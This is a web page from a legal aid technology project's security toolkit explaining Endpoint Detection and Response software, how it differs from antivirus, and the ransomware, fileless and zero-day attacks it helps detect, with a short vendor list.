Skip to main content

Quick Links

  • Share your knowledge
  • Jobs & RFP's
  • Log in
Legal Services National Technology Assistance Project
  • Forum
  • Events
  • Topics

    Topics

    Go to Topics Overview
    • Client Facing
      • Artificial Intelligence (AI)
      • Diversity, Equity, & Inclusion (DEI)
      • Social Media
      • UX / Design
      • Accessibility
      • Websites
      • Call Centers
      • Self Representative Litigation
    • Organization
      • Tech Initiative Grant (TIG)
      • Project Management
      • Tech Policies
      • Training
      • Data & Evaluation
      • Remote Work
      • Security
      • Disasters
  • Tools & Resources

    Tools & Resources

    Go to Tools & Resources Overview
    • DATA Analysis Tool for All
      • Data Overview
      • Data Resources
      • DATA Origins
      • DATA FAQ
      • Analysis Guide
      • Tips & Recommendations
      • Location Quotient
      • Partnerships
      • Give Feedback
    • Other Resources
      • Toolkits
      • Articles
      • AI & Legal Information Database
      • Legal Aid Tech Stack
      • Consumer Self-Help Solutions
  • Tech Assistance

    Tech Assistance

    Go to Tech Assistance Overview
    • Tech Assistance Program
    • Legal Aid Tech Vendors & Service Providers
  • About

    About

    Go to About Overview
    • News
  • Share your Knowledge
  • Jobs & RFPs
Search

Breadcrumb

  1. Home
  2. Tools & Resources
  3. Toolkits
  4. 4.1. Security Toolkit: Endpoint Detection and Response (EDR)

2022 Legal Aid Security Toolkit

yellow, green, and blue angled lines

Explore This Toolkit

4.1. Security Toolkit: Endpoint Detection and Response (EDR)

Last Updated: 5/05/25

Download Toolkit
Facebook
X

What Everyone Needs to Know


Endpoint Detection and Response (EDR) refers to a type of software solution that is the next evolution of traditional antivirus solutions.  Attackers just don’t stick to a single game plan anymore.  They’ve adapted and modified their methods to be much more fluid. Today’s cat and mouse game has evolved beyond the static lists that traditional antivirus solutions can deal with. EDR solutions continuously monitor what is happening with your office’s network so that staff can rapidly investigate and stop potential security incidents.


What IT Needs to Know


EDR provides deep visibility into the status of your network and allows for threat hunting capabilities to detect and block suspicious activities. It also gives you increased forensic capabilities, which allow for administrators to build a timeline of events to determine the impact of a breach. Additionally, many insurance companies are now requiring EDR solutions to be in place for organizations.

EDR is better than traditional antivirus because it can more organically respond to threats. Traditional antivirus software relies on a database of known attacks that needs to be constantly updated by vendors. These databases are good at detecting whatever the most recent attack was, but not so good at preventing new and emerging threats. EDR relies on event and behavior analysis, which helps it detect both known and unknown threats. EDR solutions can also provide you with a timeline of an attack, giving you information such as how it occurred and what it’s trying to do, along with the capability to isolate, quarantine and remediate the infected endpoint(s). EDR can help you detect and respond to ransomware attacks, fileless attacks, and zero-day attacks.

Ransomware attacks are designed to encrypt your data and demand a ransom payment to unlock your files. This is now being combined with exfiltration techniques where attackers steal your data before they encrypt it and then threaten to release this information in the dark web if payment is not received.

Fileless attacks rely on what you already have in your environment, making it hard to detect and remove from your environment. PowerShell, for example, is a built-in Windows tool used by administrators but in the wrong hands, can be used to launch these types of attacks.

Zero-day exploits are new vulnerabilities that attackers have begun to exploit before developers have had a chance to patch. This often leads to developers having to scramble to update their systems which can take days. These attacks are sudden and require immediate attention and/or action by IT administrators.

Again, EDR helps administrators detect and respond to all of these types of attacks.
 

Solutions to Consider


Crowdstrike: Website, Pricing
SentinelOne: Website, Pricing
Checkpoint: Website, Pricing
VMWare: Website, Pricing
 

Resources
 

“What is Endpoint Detection and Response” (Crowdstrike)
“What Is Endpoint Detection and Response (EDR)?” (McAfee)

Contents

Toolkit chapter traversal links for 4.1. Security Toolkit: Endpoint Detection and Response (EDR)

  • Previous
    4. Security Toolkit: Specific Security Topics: What to Look into and Why
  • Next
    4.2. Security Toolkit: Multi-Factor Authentication (MFA)
Join the Community! It's your best resource to get the answers you need.
Sign up today
dark purple dots
Legal Services National Technology Assistance Project

Key Resources

  • Browse by Topic
  • Tech Assistance
  • Tools & Resources
  • Log in

Get Involved

  • Share Your Knowledge
  • Events
  • Give us Feedback

Connect with us

Like on Facebook
Follow on Twitter
Subscribe on YouTube
Legal Services National Technology Assistance Project can leverage technology for better client service with LSNTAP's training, resources, and online community. Empowering them to serve their communities more effectively.

Our Partners

Logo for Michigan Advocacy Program white logo for Legal Services Corporation